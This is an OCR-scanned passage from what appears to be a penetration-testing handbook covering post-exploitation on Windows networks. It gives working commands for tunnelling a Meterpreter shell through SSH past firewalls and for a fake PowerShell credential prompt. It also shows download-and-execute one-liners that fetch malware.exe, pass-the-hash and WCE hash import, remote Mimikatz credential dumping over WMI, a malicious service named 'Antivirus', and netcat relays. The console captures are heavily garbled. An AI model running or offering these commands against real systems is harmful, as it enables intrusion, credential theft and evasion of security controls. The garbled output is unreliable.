a PoC, which was developed for a specific penetration test. I recommend you take the code and 
expand on it or build your own. 


Evading Application Based Firewalls 


We are seeing more and more UTM based firewalls that perform Application Level Filtering. 
Meaning, if you aren’t the right protocol for the defined port, you are going to be denied, which will 
trigger the alert. 








Building a communication tunnel yourself would be a great exercise for any pentester. Luckily, David 
Kennedy has already done the work for you.(50)(5 1) I forked a copy from David’s Github; however, I 
did have to make one change. On line 108,1 commented out the “break” in his code. 

Installation and configuration: 

• git clone https://github.com/cheetz/meterssh/opt/meterssh 

• cd /opt/meterssh 

• gedit meterssh.py 

• At the bottom modify the following: 

• user = "sshuser" 

• password = "sshpw" 

• rhost = "192.168.1.1" 

• port = "22" 

Make sure Veil-Evasion is installed as it takes care of many of the dependencies. It takes a little work 
to get everything configured since we need to start the SSH service and install some dependencies: 

• service ssh start 

• git clone https://github.com/warner/python-ecdsa.git /opt/python-ecdsa 

• cd /opt/python-ecdsa/ && wine C:/Python27/python.exe ./setup.py install 

• git clone https://github.com/paramiko/paramiko.git/opt/paramiko 

• cd /opt/paramiko/ && wine C:/Python27/python.exe ./setup.py install 

• git clone https://github.com/pyinstaller/pyinstaller.git /opt/pyinstaller 

• cd /opt/pyinstaller/ && wine C:/Python27/python.exe /opt/pyinstaller/setup.py 
install 

• cd /opt/ && wget https://pypi.python.org/packages/source/P/PyInstaller/PyInstaller- 
2.1.zip#md5=3ebl8a454311707ab7808d881e677329 && unzip Pylnstaller-2.1.zip 

• cd /opt/meterssh/ 

• wine C:/Python27/python.exe /opt/Pyinstaller-2.1/pyinstaller.py —noconsole — 
onefile meterssh.py 

After it successfully completes, you should have a new Windows Executable located at 
/opt/meterssh/dist/meterssh.exe. Copy this file to your victim host and start the meterssh.exe. 

• cd /opt/meterssh/ && python ./monitor.py 

• Execute the executable on a victim host 



iSil INK); 
1374 INFO: 

1420 INFO: 

1421 INFO: 
changed 

1423 INFO: 
3013 INFO: 
3015 INFO: 
3015 INFO: 
3019 INFO: 


checking Analysis 
checking PYZ 
checking PKG 

building because Z:\opt Vie tersshXbuildXltetersshXmeterssh.e 


building PKG (CArchive) out00-PKG.pkg 
checkina_EiE __ _ _ _ _ 

rebuilding out00-EXE,toc because pkg is more recent 
building EXE from OutiO-EXE.tot 

Appending archive to EXE Z:\opt\meterssh\dist\metersdi.exe 
:/o|>t/i»etarssji# cd /opt/mete rssh/jiS python J/monitar.py 
[* *] Launching count monito r at 5 second intervals... 

[ + ] Polling, hr Waiting for connection into SSH encrypted tunnel,,, 

[*] Polling,.. Waiting for connection into SSH encrypted tunnel,,. 

[*] Polling... Waiting for connection into SSH encrypted tunnel... 

[*] Encrypted tunnel identified* Yipee, we gots a shell! 

[*] Creating a quick Metasploit answer file for you.* 

f * 1 Launching M^t.^nploi t ... Wa it one minute... 


C :\U he«tzVDes ttopv meter; sh.exe 


[wl 
E m ] 
I « 1 
1*1 
1*1 


Shcllcode injection loaded into nenoi'y.. . 
Spanning 1 neterpreter on localliost on port i 8021 
Tunneling SSH, this tokes a nunent. 

Vou should fiAue a shell raining in a sec*. 
Connected to 1?2.168.222.12? :22* successfully 


MeterSSH 


The binary file we created executed on the victim host, connected back to our server over SSH and 
created a local port forward on 8021. Additionally, the binary tunnels a Meterpreter shell through the 
SSH tunnel, bypassing any IDS or application-based firewalls. 


[*] Processing answer.txt for ERB directives, 
resource (answer.txt)> use multi/handier 

resource (answer.txt)> set payload windows/meterpreter/bind_tcp 
payload => windows/meterpreter/bind_tcp 
resource (answer.txt)> set RH0ST 0.0.0.G 
RHOST => 0.0.0.0 

resource (answer.txt)> set LP0RT 8021 
LPORT => 8021 

resource (answer.txt)> exploit 

l*] Starting the navingd h^nriTTar _ _ 

[*] Started bind handler J I | 

[*] Sending stage (J770048 bytes) . to 0.0.0.0 

[*] Meterpreter session l\openecA(127.fe.0.1:317G9 -> 127.0.0.1:80: 
22 17:55:45 -0500 i 

meteroreter > shell 

Process 5936 created^fv .0 Quieter von become the more 1 

Channel 1 created. 

Microsoft Windows [Version 6.1.7601] 

Copyright (c) 2009 Microsoft Corporation. All rights reserved. 


C:\Users\cheetz\Desktop>J 


SSH Tunnel 











Powershell 


As you can see, PowerShell is an amazing tool to use for any penetration tester. 

One of my favorite attacks is the simplest. If you ever end up on a host where you have limited 
privileges, which prevents you from using Mimikatz or even dropping executables, you can always 
ask a user for their password. 


Let’s say you have a shell on a system (doesn’t have to be Meterpreter), what if you could push a 
popup to prompt the user to type in their credentials? Let’s demonstrate the power of PowerShell: 

• cd /opt/Easy-P 

• python ./easy-p 

• 7 - Base64 Encode 

• 1 - From File 

• /opt/PowerShell_Popup/popup.ps 1 


==Easy-P== 


[1] Privilege Escalation 

[2] Lateral Movement 

[3] Keylogging 

[4] PowerShell Meterpreter 

[5] Change Users Execution Policy 

[6] Powershell 101 

[7] Base64 Encode a PowerShell Script 

[8] Mimikatz - Passwords from Memory 
[99] Exit/Quit 


Select An Option: 7 
1 - File, 2 - One liner: 1 

full file path and file: /opt/PowerShell_Popup/popup.psl 
[*]Powershell.exe -NoP -Exec Bypass -enc ZgBlAG4AYwB0AGkAbv 
AKAC4AUwBZAE4ATwBQAFMASQBT AAoATQBvAGQAaQBmAGkAZQBkACAATgBp/ 
CAAbwBwAGUAbgBzACAAYQAgAHUAcwBlAHIAIABjAHIAZQBkAGUAbgBOAGk/ 


Base64 Encoded PowerShell Password Popup 


The output will be a long, base64 encoded string. Once we execute the command on our victim’s host, 
we should see results similar to those below. 



interpreter > shell 
Process 8924 treated. 

Channel l created. 

Microsoft Windows [Version 6,1,7661] 

Copyright |c} 2 GG 9 Microsoft Corporation, AU 

C:\Usors\cheotz>PMrshoU,o^ -NoP -Exec 8 yp* 



AHMAdAAuAHUAaQAuAFAAcgBvAGOAcABOAEYAbwByABlAc r 



PowersheUnflXfl -NaP -E^c Bypass -one ZgBiAG4- 



AB f AFA AbwBwAhHJ Ac A AKAA= 

admin 

passwo rd 



Cftdtnljal? arr -rcquirtd tq perform this apt.. yuQ 


m 

iff 


PlMstwta you user name and pitt&wfrd 

UJP rwT^r 
Pvswti'. 


E 




PowerShell Password Popup 


The window on the right shows that the victim received a popup that says, “Credentials are 
required.” Once the victim enters their credentials and hits OK, the response is sent back to our 
command shell. This is where a little social engineering takes place. In some cases, the user might hit 
cancel or close the password prompt without typing in their credentials, but ... if you run the 
















































command three or four more times, more than likely, the user will get tired of the message and will 
end up putting in their password. A benefit of this type of attack is that the victim host did not need to 
download anything from the Internet, since you encoded the whole payload and we did not need any 
elevated privileges. 


Windows 7/8 Uploading Files To The Host 


On Windows 7 and 8, a better way to get files on a host is using bitsadmin or PowerShell. Using 
bitsadmin is great because it is used for Windows updates and utilizes IE proxy settings. If the 
organization has a web proxy that requires AD credentials, this will allow you to get around it. 


PowerShell (check the Post Exploitation with PowerSploit section for more details! 

• cmd.exe /c "PowerShell (New-Object 

System.Net.WebClient).DownloadFile('http://www.securepla.net/malware.exe',' 
malware.exe');(New-Object -com Shell. Application).ShellExecute('malware.exe')" 


Bitsadmin 

• cmd.exe /c "bitsadmin /transfer myjob /download /priority high 
http://www.securepla.net/malware.exe c:\ malware.exe&start malware.exe" 

Pivoting 


If you have compromised a host and realize that it is either dual-homed or connected to multiple 
networks, your attacks will have to pivot through that compromised host. The following example will 
route a port scan through our initial victim host to the segmented network. 


Autoroute and Auxiliary Scan 

• run autoroute -s 192.168.1.0/24 

• run autoroute -p 

• background 

• use auxiliary/scanner/portscan/tcp 

• set RHOSTS 192.168.1.127 

• set PORTS 135,139,445 

• set THREADS 20 

• exploit 



msf exploit [ ;i ) > sessions -i 1 
[*1 Starting interaction with 1.,, 

meterpreter > run autoroute -s 192.160.1.0/24 _ 

[*] Adding a route to 192*168,1,0/255.255*255.0.** 

[+] Added route to 192*168.1.0/255.255.255.0 via 192.168*3.73 
[*] Use the -p option to list all active routes 
meterp reter > run auto route -p 

Active Routing Table 


Subnet Netmask Gateway 

192.168.1.0 255.255.255.0 Session 1 

meterpreter > background 
[*] Backgrounding session 1*.. 

msf exploit t ) > use auxiliary/scanner/portscan/tcp 

msf auxiliary [ ) > set RHDSTS 192.168.1.127 

RH0STS => 192.168*1*127 
msf auxiliary( • |. ) > show options 

Module options (auxiliary/scanner/portscan/tcp): 


Name 

Current Setting 

Required 

Oesc ription 

CONCURRENCY 

10 

yes 

The number of concurrer 

PORTS 

1-10000 

yes 

Ports to scan te*g* 22 

RHQSTS 

192/168.1*127 

yes 

The target address rant 

THREADS 

1 

yes 

The number of concurrer 

TIMEOUT 

100G 

yes 

The socket connect tim< 


msf auxiliary( \) > set PORTS 137,139*445 

PORTS => 137,139,445 

msf auxiliary( ) > exploit 

[*] 192* 168* 1.127:445 - TCP OPEN 
[*] 192.168.1.127:139 - TCP OPEN 
[*] Scanned 1 of 1 hosts (100% complete) 
['] Auxiliary module execution completed 


Pivoting 





Now that we have a pivot set up, we can use additional tools through that same pivot tunnel: 

• use auxiliary/scanner/discover/udp_probe 

• use exploit/windows/smb/psexec 


Socks Proxy 

Sometimes you need to run non-metasploit modules through your first victim host. It might be a 
vulnerability scanner, nmap, or a particular exploit. Once we have a Meterpreter shell, we can 
background that session and add some routes. We want to be able to pivot through this first host and 
run nmap in our example. 

In our next example, our victim host has an IP of 192.168.2.24, but also has access to the 
192.168.1.0/24 range. Since we can’t access that network directly, we will have to pivot off this box 
using proxychains: (52)(53) 

• route add 192.168.1.0 255.255.255.0 4 

• route print 

• use auxiliary/server/socks4a 

• run 


This enables a listener on our Kali attacker host on port 1080. We now need to modify the default 
proxychains configuration to match our Metasploit settings. After that, we can kick off nmap through 
our socks4 proxy using the proxychains tool: 

• gedit/etc/proxychains.conf 

o change “socks4 127.0.0.1 4444” to “socks4 127.0.0.1 1080” 

• proxychains nmap -sT -P0 -p 135,139,445 192.168.1.127 


The output should look something like: 

• root@kali:~# gedit /etc/proxychains.conf 

• root@kali:~# proxychains nmap -sT -P0 -pl35,139,445 192.168.1.127 

• ProxyChains-3.1 (http://proxychains.sf.net) 

Starting Nmap 6.47 (http://nmap.org) at 2015-03-21 17:10 EDT 
\S-chain\-<>-127.0.0.1:1080-<><>-192.168.1.127:135-<><>-OK 
\S-chain\-<>-127.0.0.1:1080-<><>-192.168.1.127:139-<><>-OK 
\S-chain\-<>-127.0.0.1:1080-<><>-192.168.1.127:445-<><>-OK 
Nmap scan report for win7-core (192.168.1.127) 

Host is up (1.5s latency). 

PORT STATE SER VICE 
135/tcp open msrpc 
139/tcp open netbios-ssn 
445/tcp open microsoft-ds 



Move Laterally with Hashes 

As you might have heard, pass-the-hash is dead... or is it? A big change that occurred in the last year 
is that Microsoft patched the ability to connect to remote systems using accounts that are members of 
the localgroup “Administrators”. This used to be the easiest method to move laterally when you 
grabbed Local Admin passwords from Group Policy Preferences and used PSExec. 


There is one exception to this-the patch did not affect local default admin accounts with RID 500. 
Even if you changed the username for the RID 500 account, it can still be used to move laterally.(54) 
(55) 


Once you obtain hashes for the RID 500 account or you get onto a network without patched client 
systems, you can use the hashes, instead of passwords, to gain Meterpreter shells. As specified 
before, we are going to use psexec_psh instead of the standard psexec. 



Module options (exploit/windows/snb/pse xe c_psh): 


Name 

Current Setting 

Required 

Description 

Dry Run- 

false 

no 

Prints the power shell comm. 

RHOST 

172,16*151.201 

yes 

The target address 

RPORT 

445 

yes 

Set the SMB service port 

SERVICE DESCRIPTION 


no 

Service description to to l 

SERVICE DISPLAY NAME 


no 

The service display name 

service - nahe 


no 

The service name 

SMBDoiain 

WORKGROUP 

no 

The Windows domain to use ■ 

SMBPass 


no 

The password for the sped 

SHBUser 


no 

The username to authentica - 


Exploit target: 


Id Name 


0 Automatic 


>31404 


\ n 


msf exploit [ -ii) > se t $M8Pass aad3b435b514Q4eeaad3p435d5|404ee:0a s3dSc 

SM EPass => aad 3 b A 35b514 04ee aad3b4 35 b5i m ee:Oaa3d8c 4a87.962d9356e39 4S0de5e bbe 
JBSI exploit) i-sexecpsh) > set SMBUser Administrator 
SHBUser Administrator 
ml exploit (|>v::et h) > exploit 


UK JC 

h 


[ f ] Started reverse handler on 172 , 16 4 151 . 141:4444 
1*1 172. 16.151 .201; 44 $ - Executing the payload... 

[+j 172.16.151.201:445 - Service start timed out, OK if running a command or n< 
[*] Sending stage (770948 bytes) to 172*16,151*201 

[*) interpreter session 5 opened { 172 , 16 . 151 . 141:4444 -> 172 . 16 . 151 . 201 : 60529 ) 


Using Hashes to Pivot 


By setting SMBPass to use the hash, we don’t need to crack any hashes to exploit remote systems. 


Moving Laterally with NTLM Hashes 

We know if we have other users logged into the system, we can use incognito and impersonate tokens. 
(56) What if you had hashes from different systems and wanted to become the remote user on the 
current compromised machine? 






This is where we can use our manipulated WCE (Windows Credential Editor) binary that we 
configured in the Evading AV section and use it to import hashes onto our victim host. For the 
example below, we are assuming we already have local admin or system type access. With our 
Meterpreter shell, upload your WCE binary to an accessible location: 

• upload /opt/wce.exe C:\\users\\public 

We can drop into a shell with the “shell” command and list our current hashes on the local machine: 

• shell 

• cd \users\public 

• wee -1 


I 

C:\Windows\system32xd \users\public 
cd \users\public 

C:\Us«rs\PubUc>wc« -1 
wc« -l 

WCE vl.42beta (X64) (Windows Credentials Editor) • (c) 2010-2013 Amplia Security ■ by Heman Oc 
Use -h for help. 

testuserl:HACKER:000000000000000000000O0000000000:0AA3O8C4A87962D93S6E09480OE5EBBE 
WIN7$:HACKER:00000000006000000000000000000000:5611751320655F7DB1FC94EIFB3CBBCE 


WCE - Importing Hashes 


meterpreter > upload /opt/wce.exe C:\\users\\pubUc 
(*) uploading : /opt/wce.exe -> C:\users\public 
I*] uploaded : /opt/wce.exe -> C:\users\public\wce.exe 
meterpreter > shell 
Process 2480 created. 

Channel 2 created. 

Microsoft Windows [Version 6.1.7601) 

Copyright (c) 2009 Microsoft Corporation. All rights reserved. 


Notice we only have two sets of hashes on this system. From a prior compromise, we were able to 
get the hashes of a domain administrator. We need to import these hashes onto our current victim host 
with the following command: 

• wce.exe -s [hash] 


As you can see from the image below, we were successful in importing the hashes for the user “lab”. 



C:\Usars\pLJbliowce -s lab:HACKER:aad3b435b&1404eeaad3b^B5b51^0^99:0aa3d8c4^079G2d93! 
wee -s UbPACKER :aad3b435b5140^eaad3b435b51^4^^aa3dSc4a37%2d93%aO948Gde&ebbe 
WCE vl,42beta (X64) (Windows Credentials Editor) - {c) 2*010-2013 Amplia Security - b 1 
Use -h for help. 

Changing NTLH credentials of current logon session {Q007D51Eh) to; 

Username: lab 
domain; HACKER 

LNHash: aad3b435b514EMseaad3b435b51404oe 
NT Hash: Baa3d8c A afi7962tJ9356el94SBdeSebbe 
NTLM credentials successfully changed! 

C:\Users\Publiotfir \\tfc\c$ 
dir \\de\c$ 

Access is denied, 

C:\Users\Publicxtet use * \\dc\c$ /user:hacker\lab 
net use * \\de\c$ /user:h»ckerUab 
Drive 1: is now connected to \\tfc\c$, 

The command completed successfully. 


C: \Use rs\Publ iodir Z; \ 
dir 2:\ 

Volume in drive l has no label. 

Volume Serial Number is 4GFB-1BE4 

Directory of z:\ ■‘the quieter you become, th 


00/22/2013 

08:52 Art 


Pe rfLogs 

12/29/2014 

03:23 Prt 

<D1R> 

Program Files 

©S/22/2013 

08:39 Art 

<DIR> 

Program FiUs (>:06) 

Gl/19/2015 

05:35 Prt 

<DIR> 

Share 

02/05/2015 

12:29 Art 

<DIR> 

Use rs 

O1/05/2015 

02:02 Art 

<D1R> 

Windows 


WCE - Access Hosts Using Hashes 



With the “lab’s” hashes imported, we can try to access the domain controller’s C-drive. When trying 
to connect to the domain controller (dc) via “dir \\dc\c$”, we get an access denied message. This is 



due to the fact that it is not using the “lab” account. We can mount the domain controller’s C-drive 
using the imported credentials with the following command: 

• net use * \\dc\c$ /user:hacker\lab 

Now, use the cached “lab” account hashes to access the domain controller. The image above shows 
that we successfully mounted the domain controller to the Z-drive and we now have the ability to 
interact with the DC. 

This attack leads to a wealth of additional attacks and is a great complement for smart, lateral 
movement. 


Moving Laterally with WMI 

WMI allows you to remotely execute PowerShell commands. The benefit of this attack is that it will 
evade anti-virus as the PowerShell commands all run in memory. In the examples below, we will be 
supplying credentials with WMI to execute our commands: 

• wmic /USER:"hacker\testuserl" /PASSWORD:" !Asdfasdfasdfl!" 
/NODE: 172.16.151.201 process call create "powershell.exe -exec bypass IEX (New- 
Object 

Net. WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSpk 
Mimikatz.ps 1'); Invoke-Mimikatz -DumpCreds | Out-File C:\\Users\\public\\a.txt" 

• dir Wwin8\c$\Users\Public\ 

• type Wwin8\c$\Users\Public\a.txt 

• del Wwin8\c$\Users\Public\a.txt 

In the image below, we are currently on the host win7. We execute a wmic call to remotely execute a 
PowerShell script against the host win8. This command will run Mimikatz and dump it out to a file on 
our remote host. Once completed, we can read this file from our win7 host. 



C: VJse rs\testuse rl>fiostname 

hostname 

win7 


C:\Users\testuserl>l 


imic /USER:"hacker\testuserl" /PASSWORD:"lAsdfasdfasdfl!" /NODE: 1 
c bypass IEX (New-Object Net.WebClient).DownloadStringl'https://raiw.githubuserconter 
mikatz.psl’); Invoke-Mimikatz -DumpCreds | Out-File C:\MJsersWpublicWa.txt 11 
wmic /USER:"hacker\testuserl" /PASSWORD:"lAsdfasdfasdfl!" /NODE:172.16.151.2G1 proce 
bject Net.WebClient).DownloadStringl'https://raw.githubuse rcontent.com/cheetz/PowerS 
-Mimikatz -DumpCreds I Out-File C:\\Users\\public\\a.txt"! 


Executing (Win32_Process)->Create() 
Method execution successful. 

Out Parameters: 

instance of _PARAMETERS 

{ 

Processld = 1328; 
RetumValue = 0; 

}; 


C:\Users\testuserl>type Wwin8\c$\UsersXPiAl il\ 
t ype \\win8\c $\Use rsVPubl ic\a.txt 

K \ 

mimikatz 2.0 alpha (x64) release 


.#####. 
.## A ##. 
## / \ ## 
## \ / ## 
'## v »*' 
'#####' 


May 23 201lm;56:4fi) 


hf 

K 


/' 


Benjamin DELPY 'gentilkiwi' ( benjamin@gentilkiwi.com ) 
ht tp://blog.gentilkiwi.c om/mimikatz (oe.eo) 

with 14 modules * * V 


Moving Laterally with WMI 


Moving Laterally Using Services 

Another way to move laterally is to move and execute a file on another system to which you have 
access. We heavily used PowerShell to download and execute files in prior examples. However, you 
might come across that one system that doesn't have PowerShell enabled. In the next command, we 
will copy our malware to the remote host’s public folder: 

• copy malware.exe \\[Remote Machine]\C$\users\public 

Then, we will create a service called Antivirus, and configure that service to execute our malware: 

• sc \\[Remote Machine] create Antivirus binpath= "c:\users\public\malware.exe" 

o Make sure to add the space between binpath= and your executable. 

Lastly, we can start that service with: 

• sc \\[Remote Machine] start Antivirus 


C;\Users\t«tus&rl\Desktflp>Mpy malware.exe \\wln8\Cj\users\public 
1 flle(s) copied, 

C:\Usersites!userl\Des.ktop>sc \\win8 create Antivirus binPath: ''c:\users\public\malware.exe” 
[sc] Createservice success 

C:\Usw5\testuserl\Desktopsc HwihS start Antivirus 


Creating Malicious Services 


Remember that you will need a privileged account on the remote machine that can create services and 
start/stop them. 






Proxy Between Hosts 

Let's say you are on the network, but you cannot reach to specific subnets because they are only 
allowed access by certain user machines or IPs. In these cases, you will have to proxy off a user with 
the proper IPs or access. 


Windows: 

One of the cheap and easy ways to proxy between hosts in segmented networks is to utilize a default 
Windows function. Netsh is a command line tool to modify network configurations. The following 
command will put the host in listening mode on port 8080 and redirect all requests to 192.168.5.33 
over port 3389. This will be an easy way to proxy RDP traffic into other hosts. Remember you will 
need elevated privileges to run these commands. 

You can either use WMIC to execute remotely or if you already have a shell, then use the following 
command: 

• netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 
connectport=3 389 c onnectaddres s= 192.168.5.33 

If you want to do it straight through Netsh remotely: 

• reg add \\<Remote 

IP>\HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v 

LocalAccountTokenFilterPolicy /t REG DWORD /d 1 

• sc \\<Remote IP> start remoteregistry 

• sc \\<Remote IP> start remoteaccess 

• netsh 

• set machine <Remote IP> 

• interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 
connectport=3 389 c onnectaddres s= 192.168.5.33 

The great part about Netsh port proxy is that it supports IPv4 to Ipv6 proxying. You can now take one 
of the compromised hosts and proxy your RDP requests to that segmented network.(57) 

Linux: 

The old but always faithful proxying through Linux uses Netcat and backpipes. On the victim host 
through which you want to proxy, run the following commands below.(58) 

• mknod backpipe p 

• nc -1 -p 8080 0<baekpipe | nc 10.0.18.134 3389 | tee backpipe 


In the example above, we proxy through the compromised host by connecting to port 8080. This 
forwards the connection to an RDP service at IP 10.0.18.134. 


Commercial Tools: 



So far, I have talked about many open source tools. Now, I want to also mention their commercial 
counterparts. This is solely to build awareness of what is available out there as a resource. I am 
frequently asked if it is better to go totally open source or commercial products. There is no right or 
wrong answer. What is important is that you do not limit yourself to one side or the other, but instead, 
find the processes, tools, and techniques that are right for that particular job. 


Cobalt Strike: 


Cobalt Strike is one of my favorite tools for a multitude of reasons. Cobalt sits on top of the 
Metasploit Framework and can attack, pivot, evade Ay establish persistence and, most importantly, 
provide custom payloads (such as Beacon). More on Beacon here: 
http://www.advancedpentest.com/help-beacon . The main reason I recommend that all pentesters look 
into Cobalt Strike is due to the way their C2s communicate over DNS. Networks are starting to 
thoroughly regulate what traffic can go out of the network with tools such as Next-Generation 
Firewalls. Tools like Cobalt Strike use DNS as a way to use the current network infrastructure in 
order to bypass a lot of the network security detection tools. 

New Cobalt Strike licenses cost $3,500 per user for a one-year license. License renewals cost 
$2,500 per user, per year. You can get a 21-day trial license by going to: 

http://www.advancedpentest.com/ 

A lot of the attacks discussed in this book-such as keyloggers, pivoting, AV evasion-are incorporated 
into Cobalt Strike in an easy-to-use fashion. The best part is that you are able to see your attacks 
visually, while having full command line, as you would with msfconsole. It is really the best of both 
worlds. 


Getting Started with Cobalt Strike: 

• http://www.advancedpentest.com/download 

• mv cobaltstrike-trial.tgz/opt/ 

• cd /opt/ 

• tar zxvf cobaltstrike-trial.tgz 

• update-java-alternatives —jre -s java-1.7.0-openjdk-i386 







Cobalt Strike 


Creating a Windows Executable: 


Cobalt Strike 



Cobalt Strike - Beacons 


• Go to View —> Beacons 

• You will see a listing of all available Beacons 

• Interact with your currently active Beacon 

• Inside the Beacon Command Prompt, type BypassUAC and select the 
beacon_payload 


























£obait Strike View Hosts Attacks Workspaces Help 

Ci»'P 

□El 

□ smtp 

□ ssh 

□ ssl 

□ telnet 
(Jtftp 





Choose a listener 

payload 

windows/meterpreter/reverse_http 
qeneric/shell reverse tcp 


Console X Beacons X Beacon 172.16.151.202@2908 beacon_payload windows/beacon_http/reverse_http 





Cobalt Strike - BypassUAC 


If we go back to the Beacons list, we will see our new Beacon connection with an asterisk (*) next to 
it. 


BB ZJ srntp 
a □ ssh 
S □ ssl 

♦ □ telnet 
s Qjtftp 

♦ Cj unicenter 

♦ Cjvnc 

♦ Cjvpn 

♦ [J winrm 
BB Cj wins 

• □ payload 



172.16.151.202 


Console X 

Beacons X 

Beacon 172.16.151.202@2908 X 

Beacon 172.16.151.202@2712 X 


external * 

internal 

user 

computer 

note 

pid 

last 

172.16.151.202 

172.16.151.202 

testuserl • 

WIN7 


2712 

59s j 

172.16.151.202 

172.16.151.202 

testuserl 

WIN7 


2908 

859ms 


Cobalt Strike - New Beacon 


If we interact with this Beacon, we can do the normal commands: 

• help - get a listing of all the commands 

• getsystem - elevate to system 

• ps - list processes 

• steal tokens - steal tokens of a Domain Admin User 

• spawn shell sessions 

• sleep 0 - for dropping into a meterpreter shell 

• mode http - for dropping into a meterpreter shell 

• meterpreter - drop into a meterpreter session 

























it. i a mu 

+ smtp 
5 [J ssh 
S Cj ssl 
+ Qj telnet 
S CJ tftp 
+ Ci unicenter 
5 Qjvnc 
it Qjvpn 
+ Ciwinrm 
+ Qjwins 
4 Cj payload 


Console X 

Beacons X 

6-aeon 172 16 151.20202008 X 

Beacon 172.16.151.202C 

spawn 
spawnto 
steal token 
task 

times tomp 

unlink 

upload 

spawn a session 

Set executable to spawn processes into 

Steal access token from a process 

Download and execute a file from a URL 

Apply timestamps from one file to another 
Disconnect from parent Beacon 

Upload a file 

beacon> aetsvstem 

(*) Task beacon to get SYSTEM 

(+) host called home, sent: 14 bytes 

1+] Impersonated ffT AUTHOR! TY\SYSTEM 


1 beacon> 1 






0 escalate 
0 droplnk 
0 getsystem 
0 msl0_073_kbdlayout 
0 net_runtiine_modify 
0 $creen_unlock 



m. 16; Bi. m 

|HACKER\te$tuserl @ WIN7 


Console 


Beacon 172.16.151.202@2712 X ; Meterpreter3 X Meterpreter3 X Dump Ha 


Post module running as background job 
Running module against WIN7 

Hashes will be saved to the database if one is connected. 

Hashes will be saved in loot in JtR password file format tot 

/root/,msf4/loot/2O150115O14752_default_172.16.151.202_windows.hashes_429476.tit 

Dumping password hashes... 

Running as SYSTEM eitracting hashes from registry 
Obtaining the boot key... 

Calculating the hboot key using SYSKEY 61311de359d2dafde9e4b565c99fcl63... 

Obtaining the user list and keys... 

Handle is invalid, retrying... 
obtaining the boot key... 

Calculating the hboot key using SYSKEY 61311de359d2dafde9e4b565c99fcl63... 

Obtaining the user list and keys... 

Decrypting user keys... 

Dumping password hints... 

No users with password hints on this system 
Dumping password hashes... 

Administrators 500:aad3b43Sb5l4Q4eeaad3b435b5l4O4ee!31d6cfeodl6ae931b73c59d7eoc089cO!: 
win 7:1000saad3b435b51404eeaad3b435b51404ee:Ic96c42db88e6248094dblf2958732c8i 11 


Cobalt Strike - Compromised Hosts 


The real benefit of Beacon is that it is a low and slow attack. You can configure it to do all your 






















command and control, and exfiltration over DNS with all the functionalities of Metasploit. 


Benefits: 

• Meterpreter in memory over Beacon 

• Beacon is low and slow 

• Full communication over DNS - no direct communication to the attacker host 

• Beacon uses Cobalt Strike's Artifact Kit to generate an anti-virus safe DLL for 
BypassUAC 

• Custom Office Files with Payloads (Word/Excel) 

• Phishing 

• Really easy use with PowerShell 

• Creating Executables to Bypass AV 

• Team mode 

o Connect multiple clients to a single server to share exploited systems 
and work together 

o http://www.advancedpentest.com/help-setup-collaboration 

Without going through all the examples, I highly recommended these videos to watch: 

• Deliver DNS Trojan with Microsoft Office Macro: 
https:// www.youtube.com/ watch?feature=player_embedded&v=Ex_bvwMDDbO 

• Cobalt Strike Training: http://www.advancedpentest.com/training 


Conclusion: 

Cobalt Strike is a must-have for a penetration tester. It heavily utilizes the Metasploit Framework, but 
extends it significantly. The penetration game is changing and what used to be smash-and-grab 
penetration testing is now about low and slow. 


Immunity Canvas 

( http://www.immunitvinc.com/products/canvas/ ) (Kali Linux/OS X/Windows) 


Immunity's Canvas makes available hundreds of exploits, an automated exploitation system, and a 
comprehensive, reliable exploit development framework to penetration testers and security 
professionals worldwide.(59) 


Similar to Metasploit’s framework, Canvas is built to be very flexible and is easy to build upon. 
Instead of being built on Ruby, as with the Metasploit Framework, Canvas is built on Python. The 
GUI is built on top of pyGTK. Canvas’ bread and butter is the fact that it uses MOSDEF. MOSDEF is 
a custom C compiler for payload construction. This allows attackers the ability to write additional 
code in the memory of the exploited host without having to touch the disk. 


Executing Canvas is pretty straightforward and once you have identified a vulnerability, exploiting it 






is very much like Metasploit. In the following example, I will build a callback trojan and execute it 
on a victim machine. 


Click to wow your appovitirwnts and tasks 


Fil« Listeners Session Report Control Help 


♦ OS 

Tercet Host Stop Exploit Configuration 


Current 

Callback 


192 168 199 128 


Current 

Targotfs) 


127.0 0 1 


& 

Screen Shots 


Modules Search Node Tree Exploit Description 


BUILDCALLBACKTROJAN 

Creates an executable that will call back to NOSDEF 


TYPE I TroJtfVS Build Callback Trojar 

HOTES: Host [192168199128 

This creates the < Port j* 555 ~E ;k troja 

callback port arvi Filename [trepanesej 

It supports Window OS Windows S *orn NOS 

support the file • : Is onl 

Windows, for now. Architecture »64 _y OU 

Windows we QnlyO HTTPMOSOEF 

These files may b« w ** <tow * 0n *V ^SL ties (f 0 

or another goneriiwindowsonly□ Encrypted >U file 

touchfromflle to i _ • «* ** Y 

If* your rospons; LJ Universal j oxocut 

-- Cancel OK 


Status Action Start Tan# End Tine Information 



Current Status Canvas Log Debug Log Data View 


Canvas 


Why get Canvas? Not only for the easy-to-build custom exploits, but for the ease of use in exploiting 
vulnerabilities and for the number of default custom exploits. Numerous times I have searched for a 
specific exploit on the Security Focus site and find no available public exploits for that vulnerability. 
However, browsing through Immunity Canvas’ repository, I will find the exact exploit I need. 


4* saowityfocusxom 421 ^opic-it 

0 Disable* X Cookies* / CSS* [j Forms* U Images* U Information* H Mtscelaneous* / Outftne* X Resue* X Took* ■ Vww Source* X Options 

OSecunlyFocus * 


• About • Contact 


Symantec Connect i » 

A technical community foe Symantec customer*, end-users, developers, and partners 


Cacti Multiple Unspecified Security Vulnerabilities 

Currently, we ere not aware of any working exploits. If you feel we are in error or if you are aware of more recent information, 
please mad us at: vuldbOsecuntyfocus.com. 


No Exploit Found on SecurityFocus 









Modul#* 5»«(h No4f Tr«« E<ploKOn<npli«n 

(YE-2014-5261 

Post-Auth CHOI in CdCIi 6.8.8b 

ARCH: [| •Linux', 'AU*)) 

SITE: Roto t4 
TYPE: Web Exploits 
(YE MARE: CVE-2014-5261 
VtNOOR: I ho Coctl Group 

CHANGELOG: http://svn.c ACti.not/viowvc?vlow«ro. Srevision"7454 
NOTES: 

This is a post-out homiest ion ccnnand injoction vulnorabillty in Cscti 8.8.8b. 

-J valid credentials with tho permissions to update the 'Global Settings' are required 
' for this eodulo to execute successfully. This CMOl is blind and you will not see 

Exploit Available Through Canvas 

For me, I use Canvas for the 0-day exploits. Immunity has partnered with: 

• Gleg - Agora 

• Gleg - SCAD+ 

• DSquare - D2 
